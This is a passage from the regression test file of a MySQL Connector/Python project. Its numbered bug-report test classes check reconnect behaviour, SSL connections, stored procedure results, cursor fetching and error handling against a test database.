self.cnx.ping()
except Exception as e:
self.fail("Error raised although connection should be "
"available (%s)." % e)
self.cnx.close()
self.assertRaises(errors.InterfaceError, self.cnx.ping)
try:
self.cnx.ping(reconnect=True)
except Exception as e:
self.fail("Error raised although ping should reconnect. (%s)" % e)
# Temper with the host to which we reconnect to simulate the
# MySQL not being available.
self.cnx.disconnect()
self.cnx._host = 'some-unknown-host-somwhere-on.mars'
self.assertRaises(errors.InterfaceError, self.cnx.ping, reconnect=True)
@cnx_config(connection_timeout=2, unix_socket=None)
@foreach_cnx()
def test_reconnect(self):
self.cnx.disconnect()
self.assertRaises(errors.InterfaceError, self.cnx.ping)
try:
self.cnx.reconnect()
except:
self.fail("Errors raised although connection should have been "
"reconnected.")
self.cnx.disconnect()
# Temper with the host to which we reconnect to simulate the
# MySQL not being available.
self.cnx._host = 'some-unknown-host-somwhere-on-mars.example.com'
self.assertRaises(errors.InterfaceError, self.cnx.reconnect)
try:
self.cnx.reconnect(attempts=3)
except errors.InterfaceError as exc:
self.assertTrue('3 attempt(s)' in str(exc))
@unittest.skipIf(sys.version_info < (3, 5), "Objects not collected by GC.")
class BugOra13435186(tests.MySQLConnectorTests):
def setUp(self):
self.sample_size = 100
self.tolerate = 5
self._reset_samples()
self.samples = [0, ] * self.sample_size
gc.collect()
def _reset_samples(self):
self.samples = [0, ] * self.sample_size
def _assert_flat_line(self, samples):
counters = {}
for value in samples:
try:
counters[value] = counters[value] + 1
except KeyError:
counters[value] = 1
if len(counters) > self.tolerate:
self.fail("Counters {} of collected object higher than tolerated."
"".format(len(counters)))
def test_converter(self):
for i in range(0, self.sample_size):
conversion.MySQLConverter()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
@foreach_cnx()
def test_connection(self):
# Create a connection and close using close()-method
for i in range(0, self.sample_size):
cnx = self.cnx.__class__(**self.config)
cnx.close()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
self._reset_samples()
# Create a connection and rely on destructor to close
for i in range(0, self.sample_size):
cnx = self.cnx.__class__(**self.config)
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
@foreach_cnx()
def test_cursor(self):
# Create a cursor and close using close()-method
for i in range(0, self.sample_size):
cursor = self.cnx.cursor()
cursor.close()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
self._reset_samples()
# Create a cursor and rely on destructor to close
for i in range(0, self.sample_size):
cursor = self.cnx.cursor()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
class BugOra14184643(tests.MySQLConnectorTests):
"""BUG#14184643: cmd_query() disregards waiting results"""
@foreach_cnx()
def test_cmd_query(self):
self.cnx.cmd_query('SELECT 1')
self.assertRaises(errors.InternalError, self.cnx.cmd_query,
'SELECT 2')
@foreach_cnx(connection.MySQLConnection)
def test_get_rows(self):
self.cnx.cmd_query('SELECT 1')
self.cnx.get_rows()
self.assertRaises(errors.InternalError, self.cnx.get_rows)
self.cnx.cmd_query('SELECT 1')
self.cnx.get_row()
self.assertEqual(None, self.cnx.get_row()[0])
self.assertRaises(errors.InternalError, self.cnx.get_row)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
@foreach_cnx(CMySQLConnection)
def test_get_rows(self):
self.cnx.cmd_query('SELECT 1')
while True:
self.cnx.get_rows()
if not self.cnx.next_result():
break
else:
self.fail("Found multiple results where only 1 was expected")
self.assertRaises(errors.InternalError, self.cnx.get_rows)
@foreach_cnx()
def test_cmd_statistics(self):
self.cnx.cmd_query('SELECT 1')
self.assertRaises(errors.InternalError, self.cnx.cmd_statistics)
self.cnx.get_rows()
class BugOra14208326(tests.MySQLConnectorTests):
"""BUG#14208326: cmd_query() does not handle multiple statements"""
def setUp(self):
self.table = "BugOra14208326"
def _setup(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.table)
self.cnx.cmd_query("CREATE TABLE %s (id INT)" % self.table)
def tearDown(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.table))
@foreach_cnx(connection.MySQLConnection)
def test_cmd_query(self):
self._setup()
self.assertRaises(errors.InterfaceError,
self.cnx.cmd_query, 'SELECT 1; SELECT 2')
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
@foreach_cnx(CMySQLConnection)
def test_cmd_query_iter(self):
self._setup()
stmt = 'SELECT 1; INSERT INTO %s VALUES (1),(2); SELECT 3'
results = []
try:
for result in self.cnx.cmd_query_iter(stmt % self.table):
results.append(result)
if 'columns' in result:
results.append(self.cnx.get_rows())
except NotImplementedError:
# Some cnx are not implementing this
if not isinstance(self.cnx, CMySQLConnection):
raise
class BugOra14201459(tests.MySQLConnectorTests):
"""BUG#14201459: Server error 1426 should raise ProgrammingError"""
def setUp(self):
self.tbl = 'Bug14201459'
def tearDown(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self._setup()
def _setup(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS %s" % (self.tbl))
@foreach_cnx()
def test_error1426(self):
cur = self.cnx.cursor()
self._setup()
create = "CREATE TABLE %s (c1 TIME(7))" % self.tbl
try:
cur.execute(create)
except errors.ProgrammingError as exception:
if tests.MYSQL_VERSION < (5, 6, 4) and exception.errno != 1064:
self.fail("ProgrammingError is not Error 1064")
elif tests.MYSQL_VERSION >= (5, 6, 4) and exception.errno != 1426:
self.fail("ProgrammingError is not Error 1426")
else:
self.fail("ProgrammingError not raised")
class BugOra14231160(tests.MySQLConnectorTests):
"""BUG#14231160: lastrowid, description and rowcount read-only"""
@foreach_cnx()
def test_readonly_properties(self):
cur = self.cnx.cursor()
for attr in ('description', 'rowcount', 'lastrowid'):
try:
setattr(cur, attr, 'spam')
except AttributeError:
# It's readonly, that's OK
pass
else:
self.fail('Need read-only property: {0}'.format(attr))
class BugOra14259954(tests.MySQLConnectorTests):
"""BUG#14259954: ON DUPLICATE KEY UPDATE VALUE FAILS REGEX"""
def setUp(self):
self.tbl = 'Bug14259954'
def _setup(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % (self.tbl))
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL AUTO_INCREMENT, "
"`c1` int(11) NOT NULL DEFAULT '0', "
"PRIMARY KEY (`id`,`c1`))" % (self.tbl))
cur.execute(create)
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
@foreach_cnx()
def test_executemany(self):
self._setup()
cur = self.cnx.cursor()
query = ("INSERT INTO %s (id,c1) VALUES (%%s,%%s) "
"ON DUPLICATE KEY UPDATE c1=VALUES(c1)") % self.tbl
try:
cur.executemany(query, [(1, 1), (2, 2)])
except errors.ProgrammingError as err:
self.fail("Regular expression fails with executemany(): %s" %
err)
class BugOra14548043(tests.MySQLConnectorTests):
"""BUG#14548043: ERROR MESSAGE SHOULD BE IMPROVED TO DIAGNOSE THE PROBLEM
"""
@foreach_cnx()
def test_unix_socket(self):
config = self.config.copy()
config['unix_socket'] = os.path.join(
tempfile.gettempdir(), 'a' * 100 + 'myconnpy_bug14548043.test')
try:
cnx = self.cnx.__class__(**config)
except errors.InterfaceError as exc:
self.assertEqual(2002, exc.errno)
class BugOra14754894(tests.MySQLConnectorTests):
"""
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'BugOra14754894'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.cmd_query("CREATE TABLE {0} (c1 INT)".format(self.tbl))
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS %s" % (self.tbl))
@foreach_cnx()
def test_executemany(self):
self.cnx.cmd_query("TRUNCATE TABLE {0}".format(self.tbl))
cur = self.cnx.cursor()
insert = "INSERT INTO {0} (c1) VALUES (%(c1)s)".format(self.tbl)
data = [{'c1': 1}]
try:
cur.executemany(insert, [{'c1': 1}])
except ValueError as err:
self.fail(err)
cur.execute("SELECT c1 FROM %s" % self.tbl)
self.assertEqual(data[0]['c1'], cur.fetchone()[0])
cur.close()
@unittest.skipIf(not tests.IPV6_AVAILABLE, "IPv6 testing disabled")
class BugOra15876886(tests.MySQLConnectorTests):
"""BUG#15876886: CONNECTOR/PYTHON CAN NOT CONNECT TO MYSQL THROUGH IPV6
"""
@foreach_cnx()
def test_ipv6(self):
config = self.config.copy()
config['host'] = '::1'
config['unix_socket'] = None
try:
cnx = self.cnx.__class__(**config)
except errors.InterfaceError as err:
self.fail("Can not connect using IPv6: {0}".format(str(err)))
else:
cnx.close()
class BugOra15915243(tests.MySQLConnectorTests):
"""BUG#15915243: PING COMMAND ALWAYS RECONNECTS TO THE DATABASE
"""
@foreach_cnx()
def test_ping(self):
cid = self.cnx.connection_id
self.cnx.ping()
# Do not reconnect
self.assertEqual(cid, self.cnx.connection_id)
self.cnx.close()
# Do not reconnect
self.assertRaises(errors.InterfaceError, self.cnx.ping)
# Do reconnect
self.cnx.ping(reconnect=True)
self.assertNotEqual(cid, self.cnx.connection_id)
self.cnx.close()
class BugOra15916486(tests.MySQLConnectorTests):
"""BUG#15916486: RESULTS AFTER STORED PROCEDURE WITH ARGUMENTS ARE NOT KEPT
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP PROCEDURE IF EXISTS sp1")
cur.execute("DROP PROCEDURE IF EXISTS sp2")
sp1 = ("CREATE PROCEDURE sp1(IN pIn INT, OUT pOut INT)"
" BEGIN SELECT 1; SET pOut := pIn; SELECT 2; END")
sp2 = ("CREATE PROCEDURE sp2 ()"
" BEGIN SELECT 1; SELECT 2; END")
cur.execute(sp1)
cur.execute(sp2)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
try:
cur.execute("DROP PROCEDURE IF EXISTS sp1")
cur.execute("DROP PROCEDURE IF EXISTS sp2")
except:
pass # Clean up fail is acceptable for this test
cnx.close()
@foreach_cnx()
def test_callproc_with_args(self):
cur = self.cnx.cursor()
exp = (5, 5)
self.assertEqual(exp, cur.callproc('sp1', (5, 0)))
exp = [[(1,)], [(2,)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
@foreach_cnx()
def test_callproc_without_args(self):
cur = self.cnx.cursor()
exp = ()
self.assertEqual(exp, cur.callproc('sp2'))
exp = [[(1,)], [(2,)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
@unittest.skipIf(os.name == 'nt',
"Cannot test error handling when doing handshake on Windows")
@unittest.skipIf(tests.MYSQL_VERSION > (8, 0, 4),
"Revoked users can no more grant")
class BugOra15836979(tests.MySQLConnectorTests):
"""BUG#15836979: UNCLEAR ERROR MESSAGE CONNECTING USING UNALLOWED IP ADDRESS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP USER 'root'@'127.0.0.1'")
try:
cnx.cmd_query("DROP USER 'root'@'::1'")
except errors.DatabaseError:
# Some MySQL servers have no IPv6 entry
pass
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query(
"GRANT ALL PRIVILEGES ON *.* TO 'root'@'127.0.0.1' "
"WITH GRANT OPTION")
cnx.cmd_query(
"GRANT ALL PRIVILEGES ON *.* TO 'root'@'::1' "
"WITH GRANT OPTION")
cnx.close()
@foreach_cnx()
def test_handshake(self):
config = self.config.copy()
config['host'] = '127.0.0.1'
config['unix_socket'] = None
try:
self.cnx.__class__(**config)
except errors.Error as exc:
self.assertTrue(
'Access denied' in str(exc) or 'not allowed' in str(exc),
'Wrong error message, was: {0}'.format(str(exc)))
class BugOra16217743(tests.MySQLConnectorTests):
"""BUG#16217743: CALLPROC FUNCTION WITH STRING PARAMETERS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS bug16217743")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug16217743")
cnx.cmd_query("CREATE TABLE bug16217743 (c1 VARCHAR(20), c2 INT)")
cnx.cmd_query(
"CREATE PROCEDURE sp_bug16217743 (p1 VARCHAR(20), p2 INT) "
"BEGIN INSERT INTO bug16217743 (c1, c2) "
"VALUES (p1, p2); END;")
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS bug16217743")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug16217743")
@foreach_cnx()
def test_procedure(self):
exp = ('ham', 42)
cur = self.cnx.cursor()
cur.callproc('sp_bug16217743', ('ham', 42))
cur.execute("SELECT c1, c2 FROM bug16217743")
self.assertEqual(exp, cur.fetchone())
@unittest.skipIf(not tests.SSL_AVAILABLE,
"BugOra16217667 test failed. Python lacks SSL support.")
class BugOra16217667(tests.MySQLConnectorTests):
"""BUG#16217667: PYTHON CONNECTOR 3.2 SSL CONNECTION FAILS
"""
def setUp(self):
config = tests.get_mysql_config()
self.admin_cnx = connection.MySQLConnection(**config)
self.admin_cnx.cmd_query(
"CREATE USER 'ssluser'@'{host}'".format(
db=config['database'], host=tests.get_mysql_config()['host']))
if tests.MYSQL_VERSION < (5, 7, 21):
self.admin_cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}' REQUIRE X509"
"".format(db=config['database'],
host=tests.get_mysql_config()['host']))
else:
self.admin_cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}'"
"".format(db=config['database'],
host=tests.get_mysql_config()['host']))
self.admin_cnx.cmd_query(
"ALTER USER 'ssluser'@'{host}' REQUIRE X509"
"".format(db=config['database'],
host=tests.get_mysql_config()['host']))
def tearDown(self):
self.admin_cnx.cmd_query("DROP USER 'ssluser'@'{0}'".format(
tests.get_mysql_config()['host']))
@foreach_cnx()
def test_sslauth(self):
config = self.config.copy()
config['user'] = 'ssluser'
config['password'] = ''
config['unix_socket']= None
config['ssl_verify_cert'] = True
config.update({
'ssl_ca': os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem')),
'ssl_cert': os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_cert.pem')),
'ssl_key': os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem')),
})
try:
self.cnx = self.cnx.__class__(**config)
except errors.Error as exc:
self.assertTrue('ssl' in str(exc).lower(), str(exc))
self.cnx.cmd_query("SHOW STATUS LIKE 'Ssl_cipher'")
self.assertTrue(self.cnx.get_rows()[0][0] != '')
@unittest.skipIf(not tests.SSL_AVAILABLE,
"BugOra16316049 test failed. Python lacks SSL support.")
class BugOra16316049(tests.MySQLConnectorTests):
""" SSL ERROR: [SSL: TLSV1_ALERT_UNKNOWN_CA] AFTER FIX 6217667"""
def setUp(self):
config = tests.get_mysql_config()
self.host = config['host']
cnx = connection.MySQLConnection(**config)
if tests.MYSQL_VERSION < (5, 7, 21):
cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}' REQUIRE SSL".format(
db=config['database'], host=tests.get_mysql_config()['host']))
else:
cnx.cmd_query(
"CREATE USER 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
cnx.cmd_query(
"ALTER USER 'ssluser'@'{host}' REQUIRE SSL".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP USER 'ssluser'@'{host}'".format(host=self.host))
cnx.close()
@foreach_cnx()
def test_ssl(self):
ssl_ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
ssl_cert = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_cert.pem'))
ssl_key = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem'))
config = self.config.copy()
config.update({
'ssl_ca': None,
'ssl_cert': None,
'ssl_key': None,
})
# Use wrong value for ssl_ca
config['user'] = 'ssluser'
config['password'] = ''
config['unix_socket']= None
config['ssl_ca'] = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_casdfasdfdsaa_cert.pem'))
config['ssl_cert'] = ssl_cert
config['ssl_key'] = ssl_key
config['ssl_verify_cert'] = True
# An Exception should be raised
try:
self.cnx.__class__(**config)
except errors.Error as exc:
exc_str = str(exc).lower()
self.assertTrue('ssl' in exc_str or 'no such file' in exc_str)
# Use correct value
config['ssl_ca'] = ssl_ca
config['host'] = 'localhost' # common name must be equal
try:
self.cnx = self.cnx.__class__(**config)
except errors.Error as exc:
if exc.errno == 1045 and ':' not in self.host:
# For IPv4
self.fail("Auth failed:" + str(exc))
if ':' in self.host:
# Special case for IPv6
config['ssl_verify_cert'] = False
config['host'] = self.host
try:
self.cnx = self.cnx.__class__(**config)
except errors.Error as exc:
if exc.errno == 1045 and not tests.IPV6_AVAILABLE:
self.fail("Auth failed:" + str(exc))
self.cnx.cmd_query("SHOW STATUS LIKE 'Ssl_cipher'")
self.assertTrue(self.cnx.get_rows()[0][0] != '')
class BugOra16662920(tests.MySQLConnectorTests):
"""BUG#16662920: FETCHALL() IGNORES NEXT_ROW FOR BUFFERED CURSORS
"""
def setUp(self):
self.tbl = 'BugOra16662920'
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.execute(
"CREATE TABLE {0} (id INT AUTO_INCREMENT, c1 VARCHAR(20), "
"PRIMARY KEY (id)) ENGINE=InnoDB".format(self.tbl)
)
data = [('a',), ('c',), ('e',), ('d',), ('g',), ('f',)]
cur.executemany("INSERT INTO {0} (c1) VALUES (%s)".format(self.tbl),
data)
cur.close()
cnx.commit()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_buffered(self):
cur = self.cnx.cursor(buffered=True)
cur.execute("SELECT * FROM {0} ORDER BY c1".format(self.tbl))
self.assertEqual((1, 'a'), cur.fetchone())
exp = [(2, 'c'), (4, 'd'), (3, 'e')]
self.assertEqual(exp, cur.fetchmany(3))
exp = [(6, 'f'), (5, 'g')]
self.assertEqual(exp, cur.fetchall())
cur.close()
@foreach_cnx()
def test_buffered_raw(self):
cur = self.cnx.cursor(buffered=True, raw=True)
cur.execute("SELECT * FROM {0} ORDER BY c1".format(self.tbl))
exp_one = (b'1', b'a')
exp_many = [(b'2', b'c'), (b'4', b'd'), (b'3', b'e')]
exp_all = [(b'6', b'f'), (b'5', b'g')]
self.assertEqual(exp_one, cur.fetchone())
self.assertEqual(exp_many, cur.fetchmany(3))
self.assertEqual(exp_all, cur.fetchall())
cur.close()
class BugOra17041412(tests.MySQLConnectorTests):
"""BUG#17041412: FETCHALL() DOES NOT RETURN SELF._NEXTROW IF AVAILABLE
"""
def setUp(self):
self.table_name = 'BugOra17041412'
self.data = [(1,), (2,), (3,)]
self.data_raw = [(b'1',), (b'2',), (b'3',)]
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % self.table_name)
cur.execute("CREATE TABLE %s (c1 INT)" % self.table_name)
cur.executemany(
"INSERT INTO %s (c1) VALUES (%%s)" % self.table_name,
self.data)
cnx.commit()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % self.table_name)
@foreach_cnx()
def test_one_all(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data[0], cur.fetchone())
self.assertEqual(1, cur.rowcount)
self.assertEqual(self.data[1:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_many_all(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data[0:2], cur.fetchmany(2))
self.assertEqual(2, cur.rowcount)
self.assertEqual(self.data[2:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_many(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data, cur.fetchall())
self.assertEqual(3, cur.rowcount)
cur.execute("SELECT * FROM %s WHERE c1 > %%s" % self.table_name,
(self.data[-1][0] + 100,))
self.assertEqual([], cur.fetchall())
@foreach_cnx()
def test_raw_one_all(self):
self._setup()
cur = self.cnx.cursor(raw=True)
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data_raw[0], cur.fetchone())
self.assertEqual(1, cur.rowcount)
self.assertEqual(self.data_raw[1:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_raw_many_all(self):
self._setup()
cur = self.cnx.cursor(raw=True)
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data_raw[0:2], cur.fetchmany(2))
self.assertEqual(2, cur.rowcount)
self.assertEqual(self.data_raw[2:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_raw_many(self):
self._setup()
cur = self.cnx.cursor(raw=True)
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data_raw, cur.fetchall())
self.assertEqual(3, cur.rowcount)
cur.execute("SELECT * FROM %s WHERE c1 > 1000" % self.table_name)
self.assertEqual([], cur.fetchall())
class BugOra16819486(tests.MySQLConnectorTests):
"""BUG#16819486: ERROR 1210 TO BE HANDLED
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16819486")
cur.execute("CREATE TABLE BugOra16819486 (c1 INT, c2 INT)")
cur.executemany("INSERT INTO BugOra16819486 VALUES (%s, %s)",
[(1, 10), (2, 20), (3, 30)])
cnx.commit()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16819486")
cnx.close()
@foreach_cnx()
def test_error1210(self):
cur = self.cnx.cursor(prepared=True)
prep_stmt = "SELECT * FROM BugOra16819486 WHERE c1 = %s AND c2 = %s"
self.assertRaises(mysql.connector.ProgrammingError,
cur.execute, prep_stmt, (1,))
prep_stmt = "SELECT * FROM BugOra16819486 WHERE c1 = %s AND c2 = %s"
exp = [(1, 10)]
cur.execute(prep_stmt, (1, 10))
self.assertEqual(exp, cur.fetchall())
class BugOra16656621(tests.MySQLConnectorTests):
"""BUG#16656621: IMPOSSIBLE TO ROLLBACK WITH UNREAD RESULTS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16656621")
cur.execute(
"CREATE TABLE BugOra16656621 "
"(id INT AUTO_INCREMENT, c1 VARCHAR(20), "
"PRIMARY KEY (id)) ENGINE=InnoDB")
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16656621")
@foreach_cnx()
def test_rollback(self):
cur = self.cnx.cursor()
cur.execute(
"INSERT INTO BugOra16656621 (c1) VALUES ('a'),('b'),('c')")
self.cnx.commit()
cur.execute("SELECT * FROM BugOra16656621")
try:
self.cnx.rollback()
except mysql.connector.InternalError:
self.fail("Rollback not possible with unread results")
class BugOra16660356(tests.MySQLConnectorTests):
"""BUG#16660356: USING EXECUTEMANY WITH EMPTY DATA SHOULD DO NOTHING
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS bug16660356")
cur.execute(
"CREATE TABLE bug16660356 (id INT AUTO_INCREMENT, c1 VARCHAR(20), "
"PRIMARY KEY (id)) ENGINE=InnoDB"
)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS bug16660356")
cnx.close()
@foreach_cnx()
def test_executemany(self):
cur = self.cnx.cursor()
try:
cur.executemany(
"INSERT INTO bug16660356 (c1) VALUES (%s)", []
)
except mysql.connector.ProgrammingError:
self.fail("executemany raise ProgrammingError with empty data")
class BugOra17041240(tests.MySQLConnectorTests):
"""BUG#17041240: UNCLEAR ERROR CLOSING CURSOR WITH UNREAD RESULTS
"""
def setUp(self):
self.table_name = 'BugOra17041240'
self.data = [(1,), (2,), (3,)]
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {table}".format(
table=self.table_name))
cur.execute("CREATE TABLE {table} (c1 INT)".format(
table=self.table_name))
cur.executemany(
"INSERT INTO {table} (c1) VALUES (%s)".format(
table=self.table_name),
self.data)
cnx.commit()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {table}".format(
table=self.table_name))
cnx.close()
@foreach_cnx()
def test_cursor_close(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM {table} ORDER BY c1".format(
table=self.table_name))
self.assertEqual(self.data[0], cur.fetchone())
self.assertEqual(self.data[1], cur.fetchone())
self.assertRaises(mysql.connector.InternalError, cur.close)
self.assertEqual(self.data[2], cur.fetchone())
@foreach_cnx()
def test_cursor_new(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM {table} ORDER BY c1".format(
table=self.table_name))
self.assertEqual(self.data[0], cur.fetchone())
self.assertEqual(self.data[1], cur.fetchone())
self.assertRaises(mysql.connector.InternalError, self.cnx.cursor)
self.assertEqual(self.data[2], cur.fetchone())
class BugOra17065366(tests.MySQLConnectorTests):
"""BUG#17065366: EXECUTEMANY FAILS USING MYSQL FUNCTION FOR INSERTS
"""
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.table_name = 'BugOra17065366'
cur.execute(
"DROP TABLE IF EXISTS {table}".format(table=self.table_name))
cur.execute(
"CREATE TABLE {table} ( "
"id INT UNSIGNED NOT NULL AUTO_INCREMENT KEY, "
"c1 INT, c2 DATETIME) ENGINE=INNODB".format(table=self.table_name))
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {table}".format(
table=self.table_name))
cnx.close()
@foreach_cnx()
def test_executemany(self):
self._setup()
cur = self.cnx.cursor()
adate = datetime(2012, 9, 30)
stmt = (
"INSERT INTO {table} (id, c1, c2) "
"VALUES (%s, %s, DATE('{date} 13:07:00'))"
"/* Using DATE() */ ON DUPLICATE KEY UPDATE c1 = id"
).format(table=self.table_name, date=adate.strftime('%Y-%m-%d'))
exp = [
(1, 0, datetime(2012, 9, 30, 0, 0)),
(2, 0, datetime(2012, 9, 30, 0, 0))
]
cur.executemany(stmt, [(None, 0), (None, 0)])
self.cnx.commit()
cur.execute("SELECT * FROM {table}".format(table=self.table_name))
rows = cur.fetchall()
self.assertEqual(exp, rows)
exp = [
(1, 1, datetime(2012, 9, 30, 0, 0)),
(2, 2, datetime(2012, 9, 30, 0, 0))
]
cur.executemany(stmt, [(1, 1), (2, 2)])
self.cnx.commit()
cur.execute("SELECT * FROM {table}".format(table=self.table_name))
rows = cur.fetchall()
self.assertEqual(exp, rows)
class BugOra16933795(tests.MySQLConnectorTests):
"""BUG#16933795: ERROR.MSG ATTRIBUTE DOES NOT CONTAIN CORRECT VALUE
"""
def test_error(self):
exp = "Some error message"
error = mysql.connector.Error(msg=exp, errno=-1024)
self.assertEqual(exp, error.msg)
exp = "Unknown MySQL error"
error = mysql.connector.Error(errno=2000)
self.assertEqual(exp, error.msg)
self.assertEqual("2000: " + exp, str(error))
class BugOra17022399(tests.MySQLConnectorTests):
"""BUG#17022399: EXECUTING AFTER CONNECTION CLOSED GIVES UNCLEAR ERROR
"""
@foreach_cnx()
def test_execute(self):
cur = self.cnx.cursor()
self.cnx.close()
try:
cur.execute("SELECT 1")
except (mysql.connector.OperationalError,
mysql.connector.ProgrammingError) as exc:
self.assertEqual(2055, exc.errno, 'Was: ' + str(exc))
@cnx_config(client_flags=[constants.ClientFlag.COMPRESS])
@foreach_cnx()
def test_execute_compressed(self):
cur = self.cnx.cursor()
self.cnx.close()
try:
cur.execute("SELECT 1")
except (mysql.connector.OperationalError,
mysql.connector.ProgrammingError) as exc:
self.assertEqual(2055, exc.errno, 'Was: ' + str(exc))
class BugOra16369511(tests.MySQLConnectorTests):
"""BUG#16369511: LOAD DATA LOCAL INFILE IS MISSING
"""
def setUp(self):
self.data_file = os.path.join('tests', 'data', 'local_data.csv')
def _setup(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS local_data")
cnx.cmd_query(
